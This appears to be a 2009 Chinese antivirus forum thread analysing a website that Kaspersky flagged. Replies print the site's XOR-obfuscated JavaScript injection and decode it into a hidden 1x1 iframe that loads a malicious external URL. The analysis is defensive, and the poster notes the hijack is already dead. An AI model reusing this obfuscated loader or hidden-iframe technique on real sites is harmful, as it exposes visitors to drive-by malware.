查看: 1755|回复: 2
收起左侧

[已鉴定] KIS报毒[挂马已失效][已检测by aarwwefdds]

[复制链接]
jingyanglf
发表于 2009-3-11 08:06:17 | 显示全部楼层 |阅读模式
KIS8 报毒


dpamv.asian-eve.com

[ 本帖最后由 jingyanglf 于 2009-3-11 08:08 编辑 ]
白玉箫
发表于 2009-3-11 10:46:54 | 显示全部楼层
<script language="JavaScript">e = '0x00' + '74';str1 = "%CF%97%9C%81%EB%86%87%8C%9F%90%C8%D5%81%9C%86%9C%95%9C%9F%9C%87%8C%CD%93%9C%97%97%90%99%D5%C9%CF%9C%91%85%94%98%90%EB%86%85%96%C8%D5%93%87%87%9B%CD%DA%DA%9E%9A%87%8C%96%99%87%D9%9C%99%91%9A%DA%9F%97%DA%86%80%99%DA%D5%EB%82%9C%97%87%93%C8%C4%EB%93%90%9C%92%93%87%C8%C4%C9%CF%DA%9C%91%85%94%98%90%C9%CF%DA%97%9C%81%C9";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

document.write改alert
雨宫优子
发表于 2009-3-11 19:52:53 | 显示全部楼层
e = '0x00' + '74';str1 = "%CF%97%9C%81%EB%86%87%8C%9F%90%C8%D5%81%9C%86%9C%95%9C%9F%9C%87%8C%CD%93%9C%97%97%90%99%D5%C9%CF%9C%91%85%94%98%90%EB%86%85%96%C8%D5%93%87%87%9B%CD%DA%DA%9E%9A%87%8C%96%99%87%D9%9C%99%91%9A%DA%9F%97%DA%86%80%99%DA%D5%EB%82%9C%97%87%93%C8%C4%EB%93%90%9C%92%93%87%C8%C4%C9%CF%DA%9C%91%85%94%98%90%C9%CF%DA%97%9C%81%C9";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);

使用Redoce的CryptHTML外部解密,原理和楼上那位说的差不多


便可解出
<div style="visibility:hidden"><iframe src="http://kotycnt.info/ld/sun/" width=1 height=1></iframe></div>

此域名已经处于停泊状态,因此无法继续向下解密
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 13:56 , Processed in 0.131584 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表